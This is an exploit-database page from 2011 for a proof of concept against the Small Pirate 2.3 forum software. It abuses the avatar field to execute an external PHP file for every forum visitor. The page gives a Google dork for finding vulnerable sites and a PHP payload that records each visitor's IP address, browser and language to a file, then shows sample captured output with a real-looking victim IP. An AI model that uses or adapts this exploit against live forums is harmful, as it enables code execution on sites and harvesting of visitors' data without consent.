Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC

🗓️ 26 Mar 2011 00:00:00Reported by Daniel GodoyType

zdt🔗 0day.today👁 23 Views

Small Pirate <= 2.3 Remote PHP File Execute PoC allows remote execution of arbitrary PHP files on visitors

# Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
# Google Dork: Powered by Spirate 2.3 & SMF
# Date: 25/03/2011
# Author: Daniel Godoy
# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
# Author Web: www.delincuentedigital.com.ar
# Software Link: http://www.spirate.net
# Tested on: Linux

[Comment]
Agradecimmientos: Hernan Jais, Alfonso Cuevas, Inyexion
          Lucas Apa, Juan Urbano, Sunplace, KikoArg
          Knet, Harakiri, Luciano Lapporta Podazza,   
          SIR y en especial a mi madre.


[POC]
This vulnerability allow execute a php external file in any visitor of the forum.
The php file should have the malicious code.
The scope of the attack depends on the strength of the php file.

<?php
// Exploit Title: Small Pirate <= 2.3 (avatar) Remote PHP File Execute PoC
$ip = $_SERVER['REMOTE_ADDR'];
$so= $_SERVER['HTTP_USER_AGENT'];
$lan= $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$url= $_SERVER['PHP_SELF'];
$path= $_SERVER['DOCUMENT_ROOT'];
$archivo = 'pwned.txt';
$fp = fopen($archivo, "a");
$string = "
$path$url
VICTIM: $ip
info: $so
language: $lan
";
$write = fputs($fp, $string);
fclose($fp);
?>

[Content of pwned.txt]

/home146/sub011/sc78626-TZRV/xxxxxxxxx.org/poc.php
 
VICTIM: 207.182.149.243
 
info: Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13
language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0



#  0day.today [2018-02-16]  #

26 Mar 2011 00:00Current

7.1High risk

Vulners AI Score7.1